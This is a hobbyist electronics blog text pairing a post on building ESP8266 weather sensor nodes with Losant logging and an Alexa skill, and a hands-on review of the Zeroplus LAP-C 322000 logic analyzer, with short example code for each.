I’ve placed four sensor nodes around the house. At the heart of each one is a Wemos D1 Mini, a $4 Arduino-compatible ESP8266 microcontroller board with built-in WiFi. A Wemos OLED shield is used to display live stats at each node, and a Wemos SHT30 sensor shield collects temperature and humidity data.

My original prototype stacked the three modules on top of each other, but I found that this configuration caused the heat from the Wemos D1 Mini to skew the temperature readings from the SHT30 sensor. The final hardware setup uses a Wemos tripler base to mount the three modules side-by-side. Each node is powered by a standard USB cable connected to a power adapter scavenged from some other long-forgotten device. The total hardware cost for the entire node is about $10, which seems amazingly inexpensive.

Three of the nodes are indoors. The fourth is outside on a patio, plugged into an outdoor electric outlet and protected from the elements by a sheet of cardboard. This node doesn’t have any OLED display (nobody is there to see it), and it uses a BMP085 sensor that measures temperature and air pressure instead of temperature and humidity. The outdoor node is unfortunately prone to crazy temperature readings when the direct sun hits its cardboard shield. The cardboard quickly warms in the sunlight, creating an oven effect that boosts the temperature readings to over 100 F, even when there are many holes in the cardboard to encourage airflow. I need to design a better enclosure for the outdoor sensor that’s not as sensitive to the sun.

This hardware setup works nicely where WiFi and electric outlets are easily available. For sensor nodes “in the field” outside WiFi range and requiring battery power, something like a Moteino may be more appropriate.

Software

The software running on each node is very simple: it’s little more than a combination of standard Arduino libraries for each of the modules. There are standard libraries for the SHT30 and BMP085 sensors, for the Wemos D1 Mini’s built-in WiFi, for the OLED display, and for the Losant data logging service. For anyone who’s done much Arduino programming, the glue code that’s needed to tie everything together is simple and can be written in an hour. See my example code.

When first powered on, the node software connects to the local WiFi network using a hard-coded SSID and password. It then connects to the data logging server, as well as an NTP server to get the current date and time. Once that’s done, it polls the sensor every 15 seconds to get the latest data. The data is displayed on the OLED, and also transmitted to the logging server. Easy peasy.
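
For anyone curious what that glue code looks like, here’s a stripped-down sketch of the flow on an ESP8266 in the Arduino environment. The WiFi calls are the standard ESP8266WiFi library, but the sensor, display, and logging calls are reduced to placeholder helpers (readTemperatureC, readHumidity, showOnOled, sendToLogger), since the real node uses the SHT30, OLED, and Losant libraries for those steps:

#include <ESP8266WiFi.h>

const char *WIFI_SSID = "my-network";   // hard-coded network credentials, as described above
const char *WIFI_PASS = "my-password";

// Placeholder helpers standing in for the sensor, display, and Losant library calls.
float readTemperatureC();
float readHumidity();
void showOnOled(float tempC, float humidity);
void sendToLogger(float tempC, float humidity);

void setup() {
    WiFi.begin(WIFI_SSID, WIFI_PASS);           // join the local WiFi network
    while (WiFi.status() != WL_CONNECTED) {
        delay(500);                             // wait for the connection to come up
    }
    // Connect to the logging server and fetch the current time via NTP (omitted here).
}

void loop() {
    float t = readTemperatureC();               // poll the sensor...
    float h = readHumidity();
    showOnOled(t, h);                           // ...show the reading locally...
    sendToLogger(t, h);                         // ...and push it to the logging server
    delay(15000);                               // repeat every 15 seconds
}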

Logging and Analysis

Displaying live data is nice, but the most interesting part of a weather logger is analyzing the collected data. By examining data over time, and comparing data from multiple nodes, it’s possible to answer burning questions like:

  • When it’s slightly warmer outside than in, will opening the windows cool the house by creating a breeze, or warm the house by admitting warmer air?
  • Does kitchen cooking have a measurable effect on indoor humidity?
  • How slowly or quickly does indoor temperature change in response to outdoor changes?
  • Is it always cooler downstairs than upstairs?
  • What’s the effect of opening specific windows around the house?

After experimenting with many different data logging and display services, I settled on Losant. Their web page looks very business-oriented and intimidating, so I initially thought it would be a poor match for my needs, but I was wrong. The system is easy to use, and is free as long as you don’t have a crazy number of nodes or data records.

Losant powers a custom web dashboard with a mix of graphs and other widgets. The layout, size, and data details are highly configurable, and a single widget can do more than simply display the latest sensor reading. For example, it can display the average, min, or max reading from a sensor over a window of time, or compute an aggregate value from several sensors.

My dashboard shows live data from the four nodes, as well as temperature, dewpoint, and atmospheric pressure graphs for the past 24 hours and past 7 days. I learned that downstairs is reliably cooler than upstairs, and that opening those windows really does create a cooling breeze. I found that a person entering a closed room for a few minutes can substantially raise its humidity (all that exhaling). My furnace has a cycle time of 20 minutes, visible in the ripple of the 24 hour temperature graph shown above. The kitchen temperature often shoots up around 4 PM when the afternoon sun comes in the windows. Outdoor low temperature was 51.9 F, reached at 7:15 AM this morning. Saturday’s outdoor low was 41.7 F at 5:40 AM. Lots of interesting stuff.

Amazon Alexa Integration

One of the most interesting features of Losant is its webhook integration. In addition to logging and displaying data, it can also interact with 3rd-party web services. A data update from a sensor node can trigger some related web request, or a web request to Losant’s servers can retrieve stored data, or even trigger a command to the sensors. There are some powerful options, and it’s all configured through a visual programming interface that Losant calls a workflow.

Using this tutorial, I created an Amazon Alexa skill for querying my weather logging nodes. The setup was a bit complex, but the tutorial does a good job of explaining the skill configuration that’s required in the Amazon developer admin interface, and the Losant workflow design. Within an afternoon of fiddling it was all working great. I can ask for the temperature or dewpoint of a specific weather node, using generic language like “temperature” or “how warm is it”. I can also make a general inquiry and have Alexa prompt me for necessary details:

“Alexa, ask the house how hot it is.”
“Which station? You can say kitchen, study, downstairs, or outside.”
“Outside”
“The current outside temperature is 63.1 degrees.”

Most of the interesting configuration work is done in the Amazon admin interface. This is where the various “intents” are defined (specific actions or requests that can be made by the user), and the vocabulary words related to each intent. It’s also where the Alexa skill is given a name, which in my example is “the house”. By beginning a request with “ask the house”, Amazon knows to process the rest of the sentence through my skill template instead of its built-in response templates. Once it determines what I’m asking for, Amazon’s server makes a web request to Losant. The Losant server looks up the desired data and returns it to Amazon, who sends it back to my Echo to be articulated as a spoken reply. Asking for the dewpoint in the kitchen may be pointless, but feels almost like conversing with the Star Trek computer. The future is here!


Zeroplus LAP-C 322000 Logic Analyzer Review

Who needs a logic analyzer? You do! If you enjoy working with electronics, a good logic analyzer is an indispensable tool. It lets you examine exactly what’s happening with your data signals, so you can troubleshoot problems quickly or reverse-engineer unknown protocols. Developing digital electronics without a logic analyzer is like navigating without a map.

In decades past, logic analyzers were bulky and expensive purpose-built machines from companies like Hewlett Packard. There’s still a place for such high-end equipment, but today most engineers can get everything they need from a small USB device that costs just a few hundred dollars. Saleae is one of the better-known names here, but it’s a crowded market with many worthy competitors. Which one is right for you?

 
Hello Zeroplus

Today I’ll take a look at an example of the Zeroplus “Logic Cube” series. Zeroplus is based in Taiwan, and their logic analyzer products have a good reputation among Taiwanese IT companies, but are less well known in the West. Full disclosure: Zeroplus sent me a demo unit for the purpose of this review. What you’ll read below are my own unfiltered opinions of the hardware’s strengths and weaknesses.

The members of this product family are buffered logic analyzers, with a few megabits of high speed on-board memory for storing the captured sample data. This is the more traditional approach to designing a logic analyzer, and it provides some advantages versus the on-the-fly USB streaming approach used by Saleae and other similar low-cost logic analyzers. Buffered LAs aren’t reliant on the PC’s USB bandwidth, so they can capture many channels at high sample rates without fear of saturating the USB link and losing data. The tradeoff is that buffered LAs have finite storage space, so the maximum amount of data that can be captured is limited. Data compression helps, but once the on-board memory is full, signal acquisition stops. In contrast, streaming LAs support “infinite” capture sizes limited only by the PC’s available RAM and disk space, but have limited bandwidth.

The Zeroplus logic analyzers in this Logic Cube series are commonly called “LAP-C” for the common prefix in all of their model numbers, and you’ll find the most pertinent resources on the web by searching for this term. LAP-C models are sold in seven different versions, differing mainly in the number of channels and amount of on-board memory. For this review, I tested the top of the line LAP-C 322000, with a retail price of $1699 in the United States. Here are the specs:

Logic Analyzer: Zeroplus LAP-C 322000
Number of Channels: 32
Sample Memory: 64 Mbits (2 Mbits per channel)
Max Sample Rate: 200 MHz
Vinput of Testing Channels: -30V to +30V DC
Retail Price: USD $1699

In comparison, the mid-range members of the LAP-C family pare back the number of channels and memory size in exchange for lower prices. For example, LAP-C 16064 is 16 channels / 1 Mbit / 100 MHz for $249, and LAP-C 16128 is 16 channels / 4 Mbits / 200 MHz for $399.

 
Unboxing and Hardware

While the front of the box has English text, the technical bullet points on the back are primarily in Chinese. This probably doesn’t matter much, since very few people will ever be browsing store shelves when shopping for a logic analyzer, but it shows that Zeroplus’ marketing team has additional translation work to do if they hope to attract more Western customers.

The 34-page instruction manual inside the box is also in Chinese, but a well-written English-language manual can be downloaded here.

The logic analyzer unit and its accessories all fit inside a hardshell zippered case that’s included. While it’s a small thing, this is a very nice touch, and it makes it easy to pack up your project when you’re finished debugging hardware. The pulse width trigger module included with the LAP-C 322000 model is the only accessory that doesn’t go in the hardshell case.

The LAP-C 322000 package includes:

  • logic analyzer main unit
  • USB cable
  • 32 flying lead wires
  • 36 IC test hooks
  • printed manual (Chinese)
  • installation software CD
  • hardshell case
  • pulse width trigger module
  • hookup wires for trigger module

The pulse width trigger module is made from brushed aluminum. When connected to the main unit, this module upgrades the logic analyzer with a new feature: the ability to trigger on a high or low pulse whose duration is outside a user-selected range. This may be useful when working on PWM applications like dimmable lighting.

The main logic analyzer unit is made from an attractive gloss white plastic. The external interface is minimal: a button to start immediate captures, and status lights for Run, Read, and Trigger. The external connector is two rows of standard 0.1 inch male headers. In addition to the 32 data channel connections and ground pins, there’s also an external clock input, and a few special I/O pins for connecting the pulse width trigger module or a second LAP-C unit.

The LAP-C does not offer any analog measurement capability. While serious analog work demands an oscilloscope, some newer logic analyzers are starting to add low-bandwidth analog capability too. This can be useful for verifying that signal voltage levels are in a valid range, or that power supplies are behaving as expected. Analog measurement is a nice extra feature, but its absence here isn’t a deal-breaker.

 
Software

The LAP-C software is Windows-only. That’s not a big limitation, since any halfway-serious engineer will have access to a Windows machine even if it’s not their main system, but Macintosh and Linux software versions would have been nice. Windows 7, 8, and 10 compatibility is advertised. I used software V3.13.05 with Windows 7. You can download the software and try it out in demo mode, even if you don’t have the LAP-C hardware. The English-language software translations are generally well done and easy to understand.

The graphical interface appears geared towards advanced users, with a very large number of tools, measurements, and options visible directly on the main screen. This is great for power users, but may be overwhelming for newbies, or to anyone accustomed to the minimal interface of Saleae’s software. I found it a bit daunting at first, but after 30 minutes of experimenting and checking the manual, I had mastered the basics.

Some aspects of the UI would benefit from more polish. When viewing large data ranges, panning and zooming the waveform can be glitchy, with a laggy response to mouse input and different portions of the waveform scrolling a fraction of a second after others. Compared to the smooth pan and zoom of competing logic analyzer software, or to tools like Google Maps, that’s a little disappointing. Other minor graphical glitches and goofs sometimes appear, like waveforms that aren’t a uniform height or scale values that are the wrong units. The intervals of the ruler are also oddly chosen, with tickmarks at 0.409374912 seconds followed by 1.91042 seconds and then 3.411465 seconds, instead of divisions at even intervals using powers of 10. None of this prevents you from analyzing captured sample data, but it can be confusing and distracting.

A data capture can be started immediately by pressing a button in the software, or by pressing the physical button on the logic analyzer unit. Captures can also be triggered by a level or edge condition on a single channel, or by more complex functions like a specific value on a parallel bus, or a protocol-level event like an I2C NACK.

There are an impressive number of powerful features embedded in the LAP-C software. Repetitive run triggers the logic analyzer over and over, so you can look for one instance that’s different from the others. Noise filter ignores pulses with a duration below the threshold you specify. Data can be captured with an asynchronous internal clock, or synchronously using an external clock connection. Captured data can be searched in several different ways to find a region of interest. Waveforms and data can be imported and exported for additional examination with other tools. There are many more advanced analysis features that I didn’t have time to explore deeply. Some of these may only be valuable in specific circumstances, like the memory analyzer for examining address/data information, but they’re great when they provide the special capabilities you need.

One small but curious shortcoming: in the software’s list of choices for the sampling rate, it skips directly from 1 MHz to 10 MHz with no intermediate options. Most of my electronics projects operate at speeds faster than 1 MHz but slower than 10 MHz, so the missing sample rate options are a bigger issue for me than they might be for others.

Capturing and viewing sets of raw waveforms is great, and is the core of logic analyzer usage. But to really get the most out of the tool, you’ll want to use the software’s protocol analyzers to provide a high-level representation of the data. A protocol analyzer is a software module that converts raw waveforms into decoded data packets. For example, if the software offers an I2C protocol analyzer, then you can view the captured sample data as a series of device addresses, data bytes, and ACKs, instead of counting raw transitions of the SDA and SCL signals while you thumb through an I2C reference guide. The LAP-C software offers over 100 protocol analyzers, including I2C, SPI, serial (RS-232C/422/485), JTAG, PS/2, USB, 1-WIRE, CAN, IRDA, 3-WIRE, and many more. Some of these used to be extra cost options, but since 2016 all the protocol analyzers are available free. Here’s a typical protocol analyzer example from Zeroplus:

 
How Much Sample Memory Do You Need?

When purchasing a buffered logic analyzer, you need to predict in advance how much sample memory you’re likely to need. Underestimating is bad: if there’s not enough sample memory, you won’t be able to capture as many channels for as long a duration as needed for your debugging work. But overestimating is bad too: it means you’ll pay hundreds of dollars extra for additional sample memory you don’t need. So how can you decide how much memory is enough?

This is a difficult question to answer, because it depends heavily on the type of electronics work that you do. You might work primarily with low speed serial signals, or you might need to analyze a wide parallel bus running at high speeds. Your data might be highly compressible with the LAP-C’s compression algorithm, or it might not. This leads to a frustrating “it depends” answer that satisfies no one.

For my own hobby electronics work over the past few years, I typically need to analyze systems with 5 to 10 signals running at speeds between 1 MHz and 10 MHz. My normal work pattern with a streaming logic analyzer is to manually start the capture, and record a few seconds of data, then examine it afterwards to zoom in on the interesting parts. Using a buffered logic analyzer, without the benefit of compression, this would require a worst case of 10 signals times 10 MHz times 10 seconds, or 1000 Mbits total. My simple experiments with LAP-C compression found that it provided about a 10x improvement for my data, so that reduces the memory requirement to 100 Mbits – close enough to the LAP-C 322000’s 64 Mbits. So with the top of the line LAP-C model, I could probably support my existing work pattern, but anything with less memory would be insufficient.
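
That estimate is easy to redo with your own numbers, since it’s just the product of channel count, sample rate, capture time, and an assumed compression ratio (the 10x figure below is what I saw with my data, and will vary a lot):

#include <stdio.h>

int main(void) {
    const double channels = 10;          // signals being captured
    const double sample_rate = 10e6;     // samples per second, per channel
    const double capture_seconds = 10;   // desired capture window
    const double compression = 10;       // assumed compression ratio (very data-dependent)

    double raw_bits = channels * sample_rate * capture_seconds;   // one bit per sample
    double stored_bits = raw_bits / compression;
    printf("Raw: %.0f Mbits, stored: %.0f Mbits\n",
           raw_bits / 1e6, stored_bits / 1e6);                    // 1000 Mbits raw, ~100 stored
    return 0;
}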

To really get the benefit of the LAP-C hardware, I would need to stop using 10 second long captures, and instead set up triggers to capture only the few hundred milliseconds or microseconds I’m really interested in. That would require some extra time for setup, but would greatly reduce the amount of memory needed.

 
Other Thoughts

Zeroplus’ web site lists two official US distributors, and one appears to only stock the entry level LAP-C 16032, leaving a single source for most LAP-C models in the US. With a bit of Google searching, you can also find third-party LAP-C sellers from Asia who will ship directly to the US. Direct sales from the Zeroplus web site would be a welcome addition, but are not currently an option.

Is the Zeroplus LAP-C series right for you? It depends on what you plan to do with it. For the casual electronics hobbyists who are typical readers of this blog, the $1699 price tag of the LAP-C 322000 may be more than they’re willing to spend, but they probably don’t need all of its features either. Zeroplus offers three LAP-C models with slightly lower specs all priced below $400, which are probably a better fit for part-time garage hackers. I expect that most hobbyists will be fine stepping down from 32 to 16 channels, although stepping down from 64 Mbits of memory to 4 Mbits or 1 Mbit may be a concern.

With 4 Mbits and 16 channels, at a 10 MHz sample rate and using compression, you’ll get a capture window of a couple hundred milliseconds. That’s small enough so that manual triggering is unrealistic. Instead, you’ll need to plan ahead of time to decide what your goal is with this capture, and how you can construct a trigger to capture exactly the region you need to examine. For power users working with high speed systems and large numbers of channels, this will already be familiar. They’re more likely to know specifically what they’re looking for, and to see complex trigger setup as a normal and expected part of debugging. They’re also more likely to benefit from some of the LAP-C’s advanced features and hardware options like external clock input, pulse width triggering, and detailed software analysis. The breadth and depth of the LAP-C software’s various tools and analyzers is impressive, and will surely be a boon for hardcore electronics engineers. Beginners and others with more basic needs may be better off with an 8-channel streaming logic analyzer with a simple and friendly software interface.

What about the general merits of buffered vs streaming logic analyzer designs? For situations where there’s enough USB bandwidth to stream the sample data on the fly, I believe that approach provides a better user experience. There’s no need to worry about trading off sample rate for sample depth, or whether the capture window will be large enough to contain all the events of interest. But for more demanding situations with large numbers of channels and high sample rates, streaming just doesn’t work. 32 channels at 200 MHz sampling rate is 6.4 Gbits/sec, which is more than USB 3.0’s total maximum theoretical bandwidth and far more than its real-world bandwidth. So depending on the application, both streaming and buffered designs have their place.

My ideal logic analyzer would be one that operates in streaming mode where sufficient USB bandwidth is available, and falls back to buffered operation when streaming won’t work. That would probably be needlessly complex and expensive, but I can dream!

